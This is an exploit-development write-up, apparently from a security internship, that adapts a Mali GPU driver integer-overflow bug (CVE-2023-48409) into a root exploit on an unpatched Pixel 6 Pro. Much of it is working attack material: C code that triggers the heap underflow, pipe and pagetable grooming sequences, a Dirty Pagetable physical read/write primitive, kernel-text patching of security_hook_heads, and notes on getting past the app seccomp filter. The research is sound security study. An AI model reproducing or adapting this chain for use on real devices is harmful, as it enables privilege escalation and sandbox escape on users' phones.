During my internship I was tasked to analyze a Mali GPU exploit on Pixel 7/8 devices and adapt it to make it work on another device: the Pixel 6 Pro.
While the exploit process itself is relatively straightforward to reproduce (in theory, we just need to find the correct symbol offsets and signatures for our target device), what’s interesting about the Pixel 6 Pro is that it uses a different Mali GPU from the Pixel 7/8, one which lacks support for a feature that one of the two vulnerabilities in the exploit relied on.
But wait, do we actually need both bugs to work?
Table of Contents
- Root Cause Analysis
- One Bug to Root
- Android’s Unique Challenges
- A Surprise Discovery
- Conclusion
- References
Root Cause Analysis
CVE-2023-48409
Here, we will first be taking a deep dive into the other vulnerability: CVE-2023-48409, which seems to be more readily exploitable. This CVE is covered in the December 2023 Pixel Security Bulletin; referencing the internal Bug ID, we can actually locate the exact patch for our device, verifying that the vulnerability is indeed fixed for December 2023 SPL onwards. As such, we will be rolling back our device version to an earlier patch, UP1A.231005.007 in our case:
raven:/ $ uname -a
Linux localhost 5.10.157-android13-4-00001-g5c7ff5dc7aac-ab10381520 #1 SMP PREEMPT Fri Jun 23 18:30:49 UTC 2023 aarch64 Toybox
raven:/ $ getprop ro.build.fingerprint
google/raven/raven:14/UP1A.231005.007/10754064:user/release-keys
From the description:
In gpu_pixel_handle_buffer_liveness_update_ioctl of private/google-modules/gpu/mali_kbase/mali_kbase_core_linux.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
The vulnerability is caused by an integer overflow when calculating the size of a kernel object allocated in preparation for an operation (very descriptively, handling a liveness update) within the GPU driver:
int gpu_pixel_handle_buffer_liveness_update_ioctl(struct kbase_context* kctx,
struct kbase_ioctl_buffer_liveness_update* update)
{
int err = 0;
struct gpu_slc_liveness_update_info info;
u64* buff;
/* Compute the sizes of the user space arrays that we need to copy */
u64 const buffer_info_size = sizeof(u64) * update->buffer_count; // [1]
u64 const live_ranges_size =
sizeof(struct kbase_pixel_gpu_slc_liveness_mark) * update->live_ranges_count;
/* Nothing to do */
if (!buffer_info_size || !live_ranges_size)
goto done;
/* Guard against nullptr */
if (!update->live_ranges_address || !update->buffer_va_address || !update->buffer_sizes_address)
goto done;
/* Allocate the memory we require to copy from user space */
buff = kmalloc(buffer_info_size * 2 + live_ranges_size, GFP_KERNEL); // [2]
/* Set up the info struct by pointing into the allocation. All 8 byte aligned */
info = (struct gpu_slc_liveness_update_info){ // [3]
.buffer_va = buff,
.buffer_sizes = buff + update->buffer_count,
.live_ranges = (struct kbase_pixel_gpu_slc_liveness_mark*)(buff + update->buffer_count * 2),
.live_ranges_count = update->live_ranges_count,
};
/* Copy the data from user space */
err =
copy_from_user(info.live_ranges, u64_to_user_ptr(update->live_ranges_address), live_ranges_size);
if (err) {
dev_err(kctx->kbdev->dev, "pixel: failed to copy live ranges");
err = -EFAULT;
goto done; // [4]
}
...
done:
kfree(buff);
return err;
}
Specifically, we are able to specify two u64s, buffer_count and live_ranges_count, such that the driver allocates an object via kmalloc(GFP_KERNEL) ([2]) which is supposed to house 3 consecutive buffers, all of which are directly user-controllable ([3]):
- buffer_sizes, with size sizeof(u64) * buffer_count
- buffer_va, with size sizeof(u64) * buffer_count
- live_ranges, with size sizeof(struct kbase_pixel_gpu_slc_liveness_mark) * update->live_ranges_count (the struct is 4 bytes)
Focusing on the live_ranges buffer:
- Allocated object size: 8*buffer_count*2 + 4*live_ranges_count ([1] and [2])
- Offset from allocated object: +8*buffer_count*2 ([1] and [3])
In this case, if the values are crafted such that 8*buffer_count*2 + 4*live_ranges_count = (1<<64) + <object_size>, our live_ranges buffer will be located 4*live_ranges_count - <object_size> bytes before the allocated object. Fortunately, since live_ranges is written to first, we can cause an invalid memory access midway through the write to abort the whole operation early, without ever writing to the other two buffers (whose bounds are blatantly invalid) ([4]). Thus, we can effectively treat the vulnerability as a fairly versatile primitive: an arbitrary-size kmalloc(GFP_KERNEL) paired with an arbitrary-length (0x10-byte-aligned) buffer underflow from the allocated object.
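For concreteness, here is a minimal sketch (not the original exploit code) of how the two counts might be crafted. The numbers aim for a 0x4000-byte allocation with a 0x4000-byte underflow in front of it (we will see later why a size above the kmalloc caches is the useful choice); the field names follow the driver source above, while the uapi header name, gpu_fd and the payload are assumptions of the sketch:
#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include "mali_kbase_ioctl.h"   /* assumed location of the uapi definitions */

#define OBJ_SIZE  0x4000ULL   /* size kmalloc() actually sees after the wrap */
#define UNDERFLOW 0x4000ULL   /* bytes written before the allocated object */

static void trigger_underflow(int gpu_fd)
{
    struct kbase_ioctl_buffer_liveness_update update = {0};

    /* 16*buffer_count wraps to -UNDERFLOW, so the total becomes OBJ_SIZE and
     * live_ranges lands UNDERFLOW bytes before the allocation */
    update.buffer_count      = (0ULL - UNDERFLOW) / 16;
    update.live_ranges_count = (UNDERFLOW + OBJ_SIZE) / 4;   /* covers underflow + object */

    /* user source: UNDERFLOW bytes of payload followed by an unmapped page, so
     * copy_from_user() faults right after the victim region is written and the
     * ioctl bails out before the two blatantly oversized copies */
    char *src = mmap(NULL, UNDERFLOW + 0x1000, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    munmap(src + UNDERFLOW, 0x1000);
    memset(src, 0x41, UNDERFLOW);                 /* placeholder victim payload */

    update.live_ranges_address  = (__u64)(uintptr_t)src;
    update.buffer_va_address    = 1;              /* only need to be non-NULL to pass the guard */
    update.buffer_sizes_address = 1;

    ioctl(gpu_fd, KBASE_IOCTL_BUFFER_LIVENESS_UPDATE, &update);
}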
While this is really powerful and there seem to be many ways to branch off from here, this vulnerability has two main limitations:
- The allocated object is immediately freed after the underflow. On paper this should not be an issue if we only need to underflow once, and we can also try to find another object to “hold” the spot temporarily if we need to.
- The write uses copy_from_user, and the underflow is set up in such a way that it is guaranteed to overflow the victim object (into our actual allocated object). In a kernel with CONFIG_HARDENED_USERCOPY enabled, this means we are directly forbidden from corrupting any object in the SLUB allocator.
But first, as a primer:
What is CONFIG_HARDENED_USERCOPY?
CONFIG_HARDENED_USERCOPY, introduced here, is a kernel config which first appeared in Linux v4.8. From the Kconfig itself, we have:
This option checks for obviously wrong memory regions when copying memory to/from the kernel (via copy_to_user() and copy_from_user() functions) by rejecting memory ranges that are larger than the specified heap object, span multiple separately allocated pages, are not on the process stack, or are part of the kernel text. This kills entire classes of heap overflow exploits and similar kernel memory exposures.
In essence, during copy_*_user, the kernel makes a call to check_object_size, which performs specific bounds checks on the target pointer if it falls within certain highlighted regions, and aborts (BUG()) if the bounds are violated. In particular, if the pointer is within a SLUB object, it ensures that, minimally, the read/write region falls entirely within the usable region of that particular object (based on the object_size of the cache), rendering most object overflow attacks invalid. Since v4.16, the whitelisted region has been further restricted to just the usercopy region of the object (based on the useroffset and usersize of the cache), though for general purpose caches it is equivalent to the entire object region anyway.
To understand the scale of the impact, we must first understand that most out-of-bounds attacks, at least back when the config was introduced, focus on overwriting or leaking a crucial field in a separate victim object placed right beside the vulnerable object. The most commonly used “techs” in this case are slab-allocated objects, especially general-purpose ones, due to their flexibility in meeting the demands of vulnerabilities commonly found on such attack surfaces.
Putting it in context, without CONFIG_HARDENED_USERCOPY, our vulnerability in question can be extremely versatile, as it has the potential to overwrite almost any object we want due to its flexible size. As an example, we can easily convert our blind write into a leak by utilizing anon_vma_name objects:
1. Spray anon_vma_name objects, ideally such that we fill an entire slab with them for greater reliability (a rough sketch of the spray is shown after this list).
2. Free one of them to create a hole, and allocate the vulnerable object in its place, overwriting the preceding anon_vma_name object such that its char buffer is extended into the following anon_vma_name object.
3. If we have marked the objects beforehand, we have now found out the ids of both the anon_vma_name objects preceding and following the vulnerable object, effectively overcoming CONFIG_SLAB_FREELIST_RANDOM: the preceding object will have its name extended, while the id of the following object will appear in the extended name.
4. Free the following anon_vma_name object and allocate in its place any suitable object (of matching size and type) whose first field we want leaked.
In practice, since CONFIG_HARDENED_USERCOPY is enabled by default, trying to execute step 2 above immediately crashes our kernel. This feature completely nips many out-of-bounds vulnerabilities in the bud, while severely limiting potential options for the rest. In our case, however, we do still have a way out.
The Missing Piece: CVE-2023-26083
Working with a heavily nerfed write vulnerability, the best bet is to first generate an address leak that we can subsequently manipulate. In the original exploit, this is realized through the second vulnerability, CVE-2023-26083.
Briefly, a stream functionality in the driver (tlstream), freely exposed to userspace processes including unprivileged ones, potentially contains kernel addresses of certain objects as plain bytes. In particular, the exploit identifies kbase_kcpu_command_queue, which:
- Can be freely sprayed;
- Allows for targeted kfrees; and
- Readily leaks its address into the stream.
From the original writeup, the offending function in this case is as follows:
void __kbase_tlstream_tl_kbase_kcpuqueue_enqueue_fence_wait(
struct kbase_tlstream *stream,
const void *kcpu_queue,
const void *fence
)
{
const u32 msg_id = KBASE_TL_KBASE_KCPUQUEUE_ENQUEUE_FENCE_WAIT;
const size_t msg_size = sizeof(msg_id) + sizeof(u64)
+ sizeof(kcpu_queue)
+ sizeof(fence)
;
char *buffer;
unsigned long acq_flags;
size_t pos = 0;
buffer = kbase_tlstream_msgbuf_acquire(stream, msg_size, &acq_flags);
pos = kbasep_serialize_bytes(buffer, pos, &msg_id, sizeof(msg_id));
pos = kbasep_serialize_timestamp(buffer, pos);
pos = kbasep_serialize_bytes(buffer,
pos, &kcpu_queue, sizeof(kcpu_queue)); // [1]
pos = kbasep_serialize_bytes(buffer,
pos, &fence, sizeof(fence));
kbase_tlstream_msgbuf_release(stream, acq_flags);
}
Note that kbasep_serialize_bytes (at [1]) is nothing but a memcpy into the acquired tlstream buffer:
static inline size_t kbasep_serialize_bytes(
char *buffer,
size_t pos,
const void *bytes,
size_t len)
{
KBASE_DEBUG_ASSERT(buffer);
KBASE_DEBUG_ASSERT(bytes);
memcpy(&buffer[pos], bytes, len);
return pos + len;
}
Since a reference to the kernel address is used as the source of the memcpy, the address itself gets written into the buffer as bytes, effectively handing us a free leak.
Now, as mentioned at the beginning, this did not directly work for our device. Trying to acquire a tlstream the way the original exploit does threw us an -EINVAL, and looking through the source made me realize that the code surrounding kbase_kcpu_command_queue was not even compiled (spoiler!) into our version of the driver in the first place. Hence, we will be setting this vulnerability aside (for now).
One Bug to Root
Going back to our underflow vulnerability: the starting point is that instead of the slab allocator, we will have to target the page allocator directly. While most kernel objects are allocated through the slab allocator, the general purpose caches only cover up to a certain size – kmalloc-8k in most cases, corresponding to order-1 block allocations. Thus, a call to kmalloc(sz, GFP_KERNEL) or similar where sz > 0x2000 results in the kernel delegating the allocation to the page allocator instead, stripping away the protection from CONFIG_HARDENED_USERCOPY, but minimally allocating an order-2 block (0x4000 bytes).
Then, we can directly allocate an order-2 block for our vulnerable object. Unlike the slab allocator, which has a further layer of protection, namely CONFIG_SLAB_FREELIST_RANDOM (albeit still relatively easily bypassable), the page allocator works directly with the underlying physical memory, where we can groom the allocator much more effectively to get it to produce two consecutive addresses. (Unfortunately, this is not 100% guaranteed, so there is a chance that one of the pages goes to something else, potentially triggering CONFIG_HARDENED_USERCOPY and crashing the system, presenting a minor annoyance.)
This was what the original exploit made use of as well: it allocated a pipe_buffer array object with total size greater than the slab allocation threshold, and hijacked its page pointer to acquire unlimited read/write on a single arbitrary address (which can in theory be repeated over and over, but that would be less reliable). Of course, this unfortunately requires a prior leak, previously acquired through the second vulnerability, which we do not have access to in our scenario. Similar techniques like Page UAF wouldn’t work either, as that requires modifying the first byte of the page pointer, which is not possible with an underflow.
What we first need to achieve is to convert this restricted underflow into some form of address leak. While it is definitely possible to hunt the kernel source for a suitable tech that leaks an address when modified (kcalloc seems like a great starting point), there is actually a more straightforward alternative: why don’t we guess the address instead?
Physmap Spraying
ret2dir was a popular technique abusing the physmap, which, briefly, is a direct 1:1 mapping of physical memory onto the kernel virtual address space, where any physical address is a direct linear translation (the offset being the start address of the region) of a certain virtual address.
Here, we are more concerned with the “spraying” portion: we know that physical memory is limited, and that the page allocator is relatively predictable in the regions of memory it will allocate from. We can perhaps exhaust the page allocator with some sprayable victim object in order to maximize the chances of the object being allocated at our chosen address (our “educated guess”), as outlined in the original paper.
We will however have to figure out a desirable address ourselves. To do so, we can hack up a dummy driver to force the kernel to allocate as many pages as possible, and figure out where the allocations are made.
void *spray_head = NULL; // linked list head for batch freeing upon exit

static long dummy_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
    struct dummy_ioctl_struct data = { .addr = 0 };
    void *tmp;

    switch (cmd) {
    case DUMMY_IOCTL_SPRAY_ONE:
        /* Allocate a single order-0 page and report its address to userspace */
        tmp = (void *)__get_free_pages(GFP_KERNEL, 0);
        if (tmp) {
            /* Chain the page into the spray list so it can be freed later */
            *(void **)tmp = spray_head;
            spray_head = tmp;
            data.addr = (u64)tmp;
        }
        if (copy_to_user((void __user *)arg, &data, sizeof(data))) {
            return -EFAULT;
        }
        break;
    default:
        return -EINVAL;
    }
    return 0;
}
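The matching user-space side can be as simple as the following sketch, which calls the ioctl in a loop and logs every returned address so the distribution can be plotted across runs; /dev/dummy_spray and the shared header are hypothetical names for the dummy driver's interface:
#include <fcntl.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include "dummy_ioctl.h"   /* hypothetical header shared with the dummy driver */

int main(void)
{
    struct dummy_ioctl_struct data;
    int fd = open("/dev/dummy_spray", O_RDWR);
    FILE *log = fopen("allocs.txt", "w");

    for (long i = 0; i < 1500000; i++) {
        if (ioctl(fd, DUMMY_IOCTL_SPRAY_ONE, &data) < 0)
            break;
        fprintf(log, "%llx\n", (unsigned long long)data.addr);
    }
    fclose(log);
    return 0;
}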
As an example, here’s a graph of 1,500,000 single page allocations across multiple runs:
It should be noted that the entropy of the starting address across device reboots is insignificant compared to the range of addresses we are spraying, so it is not a concern either:
By picking an address that consistently appears across runs, we have effectively emulated an address leak, where we can, for example, subsequently overwrite a pipe_buffer page pointer to point to that address for a read/write on that page.
Now comes the choice of our spray object. Unfortunately, we cannot spray pipe_buffer directly to gain full control over one, due to the system limitation on the maximum number of pages a user can allocate for pipes: /proc/sys/fs/pipe-user-pages-soft, set to 16384 (0x4000) in our case, i.e. 0xa0000 bytes worth of pipe_buffers.
Pagetable Spraying
At this point, my mentor introduced me to a useful technique: Dirty Pagetable by @ptrYudai. Essentially, this technique relies on the fact that the pagetables themselves (the last level of the structure which helps to map a virtual address to a physical address) are allocated by the page allocator as ordinary order-0 blocks, and with a write primitive, we can modify one of their entries to make an mmap-ed userland virtual page reflect almost any arbitrary physical page.
This has a similar effect to pipe_buffer, but it concerns physical addresses directly. A crucial difference however is that it is much more sprayable: while a limit still exists (vm.max_map_count = 65530), this is a per-process limit, so we can easily fork a bunch of processes to spray more pagetables (see the sketch after the snippet below). We can also optimize the number of pagetable objects sprayed in each process by allocating just 1 page in each pagetable.
/*
* (in PGD) (in PUD) (in PMD) (in PTE) (in page)
* PUD# PMD# PTE# PAGE# OFFSET
* 4444 4333 3333 3322 2222 2221 1111 1111 0000 0000 0000
* 0000 0000 0000 0100 0000 0000 0000 0000 0000 0000 0000 base addr
* 0000 0000 0000 0100 0000 1001 1111 1111 0000 0000 0000 sample spray (idx 4)
*/
#define BASE_ADDR (1UL<<(12+9+9))
#define PAGE_ADDR(x) ((BASE_ADDR)+((uint64_t)(x)<<(12+9)) | 511UL<<12)
static inline int mmap_page(uint64_t page_idx) {
if (mmap((void *)PAGE_ADDR(page_idx), 0x1000,
PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED,
-1, 0) == (void *)-1) return -1;
return 0;
}
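Building on that, a rough sketch of the forked spray might look like this: each child maps and touches one page per 2MB region via mmap_page() above, forcing one fresh PTE table per mapping, then sleeps so its pagetables stay alive (process and mapping counts are illustrative):
#include <unistd.h>

static void spray_pagetables(int nproc, int maps_per_proc)
{
    for (int p = 0; p < nproc; p++) {
        if (fork() == 0) {
            for (int i = 0; i < maps_per_proc; i++) {
                if (mmap_page(i) == 0)
                    /* fault the page in: this is what allocates the PTE table */
                    *(volatile char *)PAGE_ADDR(i) = 0x41;
            }
            for (;;)
                pause();   /* keep the mappings (and their pagetables) alive */
        }
    }
}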
There is a caveat to this method: in order to actually allocate the pagetable object, we will have to cause a fault by accessing / writing to its page, allocating the actual mmap page (also of order-0, of course) in the process. This mmap page itself undesirably competes with the pagetable object to be allocated at our target address. The silver lining however is that they are of a different migrate type in the page allocator:
static inline struct page *
alloc_zeroed_user_highpage_movable(struct vm_area_struct *vma,
unsigned long vaddr)
{
struct page *page = alloc_page_vma(GFP_HIGHUSER_MOVABLE | __GFP_CMA, vma, vaddr);
if (page)
clear_user_highpage(page, vaddr);
return page;
}
Each migrate type (movable vs unmovable in this case) has its own corresponding pageblocks, of order pageblock_order (which has the value of 10 on our device according to /proc/pagetypeinfo), from which pages will be allocated. Since the two types of pages (mmap pages and pagetable pages) are linearly allocated together, our pagetables will end up in either the pageblock housing our chosen address or the pageblock directly after it (2**10 pages = 0x400000 bytes apart in our case). That is to say, we will have to check both addresses in order to reliably find a pagetable.
That aside, by spraying the pagetables, we also manage to more or less exhaust the order-2 freelist and groom the page allocator to quite reliably provide consecutive order-2 blocks subsequently, allowing us to then trigger the vulnerability easily. Instead of corrupting pipe_buffer, we can also opt to overwrite some pagetable objects themselves, as this nets us greater control over the entire page. But since they are of a different order (order-0), a bit more setup is required (see the sketch after this list):
- Allocate 2 pipe_buffer arrays of order-2, which should be consecutive in memory.
- Free the first pipe_buffer array (via close), and spray a few more pagetable objects to force the page allocator to split up and allocate from that pipe_buffer order-2 block.
- Free the second pipe_buffer array, and allocate the malicious object to trigger the underflow, overwriting the pagetable entries before the object.
- By overwriting with our chosen physical address, one of our freshly mmap-ed pages should now reflect an actual pagetable object in memory (our “puppet” pagetable).
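A rough sketch of this sequence, where trigger_underflow() stands for the malicious KBASE_IOCTL_BUFFER_LIVENESS_UPDATE call sketched earlier and spray_pagetables() is the helper from before; 256 slots of struct pipe_buffer exceed 0x2000 bytes, so each resized ring comes straight from the page allocator as an order-2 block:
#define _GNU_SOURCE
#include <fcntl.h>
#include <unistd.h>

void groom_and_trigger(int gpu_fd)
{
    int a[2], b[2];
    pipe(a);
    pipe(b);
    fcntl(a[1], F_SETPIPE_SZ, 0x100 * 0x1000);   /* order-2 pipe_buffer array #1 */
    fcntl(b[1], F_SETPIPE_SZ, 0x100 * 0x1000);   /* order-2 pipe_buffer array #2, ideally right after #1 */

    /* free the first array and let fresh pagetables carve up its order-2 block */
    close(a[0]); close(a[1]);
    spray_pagetables(1, 16);

    /* free the second array and reclaim its block with the vulnerable object,
     * underflowing into the pagetable pages now sitting just before it */
    close(b[0]); close(b[1]);
    trigger_underflow(gpu_fd);
}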
Side note: most likely due to how our puppet pagetable gets treated as an mmap-ed page, we will need to choose a different target address across independent exploit runs, but this is a small issue as we can simply choose the next available page next time (by adding 0x1000 to our previous target addresses).
Then, we can identify our puppet page by nudging its exposed pagetable entry to some other address and iterating through all the previously sprayed pages to check which one has its memory altered. The current setup is as illustrated below, which we can then manipulate to achieve arbitrary physical address read/write:
(Green cells represent pages accessible from userspace)
Note that sometimes overwriting the pagetable entry does not immediately reflect in the puppet page due to TLB caching. We can choose to either just wait for a short duration or force a flush by calling mprotect (and then resetting the entry flags as needed).
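Put together, the primitive might be wrapped up roughly as follows, assuming we have already identified puppet_pt (the sprayed VA that aliases a real pagetable) and window (a sprayed page translated by entry win_idx of that pagetable); the attribute bits are simply recycled from the existing descriptor:
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>

#define PA_MASK 0x0000fffffffff000ULL   /* output-address bits of a level-3 descriptor */

/* len must not cross a page boundary */
void phys_access(volatile uint64_t *puppet_pt, int win_idx, uint8_t *window,
                 uint64_t paddr, void *buf, size_t len, int is_write)
{
    uint64_t attrs = puppet_pt[win_idx] & ~PA_MASK;   /* keep the existing attribute bits */
    puppet_pt[win_idx] = (paddr & PA_MASK) | attrs;   /* retarget the window page */

    /* flush the stale TLB entry, as noted above */
    mprotect(window, 0x1000, PROT_READ);
    mprotect(window, 0x1000, PROT_READ | PROT_WRITE);

    if (is_write)
        memcpy(window + (paddr & 0xfff), buf, len);
    else
        memcpy(buf, window + (paddr & 0xfff), len);
}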
From Physical to Virtual: Converting Our Primitive
Funnily, we still do not have a proper leak yet. Attempting to munmap the associated page does not immediately free the pagetable, but instead queues it via RCU:
static void __tlb_remove_table_free(struct mmu_table_batch *batch)
{
int i;
for (i = 0; i < batch->nr; i++)
__tlb_remove_table(batch->tables[i]);
free_page((unsigned long)batch);
}
...
static void tlb_remove_table_rcu(struct rcu_head *head)
{
__tlb_remove_table_free(container_of(head, struct mmu_table_batch, rcu));
}
static void tlb_remove_table_free(struct mmu_table_batch *batch)
{
call_rcu(&batch->rcu, tlb_remove_table_rcu);
}
Since we cannot reliably free the pagetable, we do not get to replace it with another useful object. One workaround is to sprinkle in the useful objects during the pagetable spray, such that we can search the neighborhood of our exposed pagetable to reach it. Of course, in this case we can use pipe_buffer again, leaking a kernel text pointer as well as gaining arbitrary read/write on virtual addresses. From there, we can perform our standard kernel modifications to get root.
Android’s Unique Challenges
My mentor later pointed out that for Pixel devices, the physical address of the kernel image is actually fixed:
raven:/ # cat /proc/iomem | grep -i kernel
80000000-82c8ffff : Kernel code
82f00000-831cffff : Kernel data
(It was also noted a few years ago here that AArch64 in general did not directly implement physical KASLR.)
This means we can actually point our pagetable entry directly to a kernel text page, without separately needing to leak or guess an address. Hence we do not have to perform physmap spray anymore, which improves our exploit reliability. Granted, we still have to groom the heap somewhat in order to align the order-0 pagetable object and our order-2 malicious object. In addition, changing our write address iteratively is still possible (by repeatedly triggering the bug) but not as reliable; it is more reliable to corrupt multiple pagetables (since up to 4 can fit within an order-2 block) at once.
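As a sketch of what this buys us, the window from earlier can be pointed straight at the kernel image; PHYS_KERNEL_BASE comes from /proc/iomem above, while the image offsets must be taken from the matching kernel build (an assumption of this sketch):
#include <stddef.h>
#include <stdint.h>

#define PHYS_KERNEL_BASE 0x80000000ULL  /* "Kernel code" start from /proc/iomem above */

/* pieces identified earlier, plus the phys_access() sketch from the previous section */
extern volatile uint64_t *puppet_pt;
extern int win_idx;
extern uint8_t *window;
void phys_access(volatile uint64_t *pt, int idx, uint8_t *win,
                 uint64_t paddr, void *buf, size_t len, int is_write);

static void write_kernel_image(uint64_t img_off, void *patch, size_t len)
{
    phys_access(puppet_pt, win_idx, window, PHYS_KERNEL_BASE + img_off, patch, len, 1);
}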
Since we are accessing the physical pages of the kernel, we are also not bound by the permissions set on the virtual addresses, allowing us to directly access and modify them from userspace. This is similar in spirit to the USMA attack, but again, in this case we are able to bypass the need for an address leak.
Then, similar to the USMA attack highlighted above, we can opt to overwrite the check in __sys_setuid:
long __sys_setuid(uid_t uid)
{
...
retval = -EPERM;
if (ns_capable_setid(old->user_ns, CAP_SETUID)) { // TO BYPASS
new->suid = new->uid = kuid;
if (!uid_eq(kuid, old->uid)) {
retval = set_user(new);
if (retval < 0)
goto error;
}
} else if (!uid_eq(kuid, old->uid) && !uid_eq(kuid, new->suid)) {
goto error;
}
new->fsuid = new->euid = kuid;
...
}
This method has two small issues:
- The underlying code may be unpredictable across different kernel builds.
- This only allows us to modify our uid; we will need a separate page for gid.
An alternative is to delve into the underlying code of ns_capable_setid, which both __sys_setuid and __sys_setgid use.
static bool ns_capable_common(struct user_namespace *ns,
int cap,
unsigned int opts)
{
int capable;
if (unlikely(!cap_valid(cap))) {
pr_crit("capable() called with invalid cap=%u\n", cap);
BUG();
}
capable = security_capable(current_cred(), ns, cap, opts);
if (capable == 0) {
current->flags |= PF_SUPERPRIV;
return true;
}
return false;
}
...
bool ns_capable_setid(struct user_namespace *ns, int cap)
{
return ns_capable_common(ns, cap, CAP_OPT_INSETID);
}
EXPORT_SYMBOL(ns_capable_setid);
The referenced security check can be found within security/security.c:
#define call_int_hook(FUNC, IRC, ...) ({ \
int RC = IRC; \
do { \
struct security_hook_list *P; \
\
hlist_for_each_entry(P, &security_hook_heads.FUNC, list) { \
RC = P->hook.FUNC(__VA_ARGS__); \
if (RC != 0) \
break; \
} \
} while (0); \
RC; \
})
...
int security_capable(const struct cred *cred,
struct user_namespace *ns,
int cap,
unsigned int opts)
{
return call_int_hook(capable, 0, cred, ns, cap, opts);
}
Notably, the kernel iterates through the capable entry in security_hook_heads, which is represented as a linked list (an hlist in this case) of hook functions, and passes (returns 0) if every function in the linked list passes its corresponding check.
#define hlist_for_each_entry(pos, head, member) \
for (pos = hlist_entry_safe((head)->first, typeof(*(pos)), member);\
pos; \
pos = hlist_entry_safe((pos)->member.next, typeof(*(pos)), member))
Thus, if we clear out security_hook_heads.capable (which is just a pointer to the first hlist_node), we skip the iteration entirely, passing the whole check by default. Now this allows us to call setuid(0) directly and achieve root.
Note that security_hook_heads is marked __ro_after_init, so we can really only modify it via a kernel text write, at which point anything is already possible. This method helps to streamline the root process and removes a lot of guesswork and kernel-specific implementation details.
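A sketch of that idea, reusing write_kernel_image() from earlier; both offsets are placeholders to be pulled from the target build's symbol table:
#include <stdint.h>

/* placeholders: offset of security_hook_heads into the kernel image and of the
 * .capable member within it, both from the target build's symbols */
#define SECURITY_HOOK_HEADS_IMG_OFF 0x0
#define CAPABLE_HEAD_OFF            0x0

static void neuter_capable_hooks(void)
{
    uint64_t zero = 0;
    /* security_hook_heads.capable is an hlist_head, i.e. a single pointer;
     * clearing it empties the hook list so call_int_hook() falls through to 0 */
    write_kernel_image(SECURITY_HOOK_HEADS_IMG_OFF + CAPABLE_HEAD_OFF, &zero, sizeof(zero));
}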
Bypassing Android’s App Sandbox
In the Termux environment however, things are not that simple – when we attempt to call setuid(0), our program immediately crashes with SIGSYS: Bad system call. This is due to the seccomp filter inherently enabled on all applications. We can see this in effect when we try to run an empty binary with just a setuid syscall:
05-20 13:42:21.366 12094 12094 I crash_dump64: obtaining output fd from tombstoned, type: kDebuggerdTombstoneProto
05-20 13:42:21.366 596 596 I tombstoned: received crash request for pid 12091
05-20 13:42:21.366 12094 12094 I crash_dump64: performing dump of process 12091 (target tid = 12091)
05-20 13:42:21.369 12094 12094 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
05-20 13:42:21.369 12094 12094 F DEBUG : Build fingerprint: 'google/raven/raven:14/UP1A.231005.007/10754064:user/release-keys'
05-20 13:42:21.369 12094 12094 F DEBUG : Revision: 'MP1.0'
05-20 13:42:21.369 12094 12094 F DEBUG : ABI: 'arm64'
05-20 13:42:21.369 12094 12094 F DEBUG : Timestamp: 2025-05-20 13:42:21.367252620+0800
05-20 13:42:21.369 12094 12094 F DEBUG : Process uptime: 1s
05-20 13:42:21.369 12094 12094 F DEBUG : Cmdline: ./xpl
05-20 13:42:21.369 12094 12094 F DEBUG : pid: 12091, tid: 12091, name: xpl >>> ./xpl <<<
05-20 13:42:21.369 12094 12094 F DEBUG : uid: 10266
05-20 13:42:21.369 12094 12094 F DEBUG : tagged_addr_ctrl: 0000000000000001 (PR_TAGGED_ADDR_ENABLE)
05-20 13:42:21.369 12094 12094 F DEBUG : signal 31 (SIGSYS), code 1 (SYS_SECCOMP), fault addr --------
05-20 13:42:21.369 12094 12094 F DEBUG : Cause: seccomp prevented call to disallowed arm64 system call 146
05-20 13:42:21.369 12094 12094 F DEBUG : x0 0000000000000000 x1 0000007fc763ba38 x2 0000007fc763ba48 x3 0000007fc763b9f0
05-20 13:42:21.369 12094 12094 F DEBUG : x4 00000074d5b4e0c0 x5 0000000001414d4c x6 0000000001414d4c x7 00000074d5b4e004
05-20 13:42:21.369 12094 12094 F DEBUG : x8 0000000000000092 x9 020bdbd74cb253c0 x10 0000000000000000 x11 0000000000000000
05-20 13:42:21.369 12094 12094 F DEBUG : x12 0000000000000000 x13 0000000000000000 x14 0000000000000001 x15 0000000000000008
05-20 13:42:21.369 12094 12094 F DEBUG : x16 00000055f5c07ed8 x17 00000074d2346570 x18 00000074d6906000 x19 00000055f5c06a84
05-20 13:42:21.369 12094 12094 F DEBUG : x20 0000007fc763ba48 x21 0000000000000001 x22 0000007fc763ba38 x23 0000000000000000
05-20 13:42:21.369 12094 12094 F DEBUG : x24 0000000000000000 x25 0000000000000000 x26 0000000000000000 x27 0000000000000000
05-20 13:42:21.369 12094 12094 F DEBUG : x28 0000000000000000 x29 0000007fc763b9b0
05-20 13:42:21.369 12094 12094 F DEBUG : lr 00000055f5c06aac sp 0000007fc763b940 pc 00000074d2346578 pst 0000000060001000
05-20 13:42:21.369 12094 12094 F DEBUG : 3 total frames
05-20 13:42:21.369 12094 12094 F DEBUG : backtrace:
05-20 13:42:21.369 12094 12094 F DEBUG : #00 pc 00000000000b4578 /apex/com.android.runtime/lib64/bionic/libc.so (setuid+8) (BuildId: 19c32900d9d702c303d2b4164fbba76c)
05-20 13:42:21.369 12094 12094 F DEBUG : #01 pc 0000000000003aa8 /data/data/com.termux/files/home/xpl (main+36)
05-20 13:42:21.369 12094 12094 F DEBUG : #02 pc 00000000000546e8 /apex/com.android.runtime/lib64/bionic/libc.so (__libc_init+104) (BuildId: 19c32900d9d702c303d2b4164fbba76c)
The official blogpost above mentioned that only 17 syscalls are blocked by default. We can consult the list of blocked syscalls in libc/SECCOMP_BLOCKLIST_*.TXT of the bionic library source code.
# syscalls to modify IDs
int setgid:setgid32(gid_t) lp32
int setgid:setgid(gid_t) lp64
int setuid:setuid32(uid_t) lp32
int setuid:setuid(uid_t) lp64
int setregid:setregid32(gid_t, gid_t) lp32
int setregid:setregid(gid_t, gid_t) lp64
int setreuid:setreuid32(uid_t, uid_t) lp32
int setreuid:setreuid(uid_t, uid_t) lp64
int setresgid:setresgid32(gid_t, gid_t, gid_t) lp32
int setresgid:setresgid(gid_t, gid_t, gid_t) lp64
# setresuid is explicitly allowed, see above.
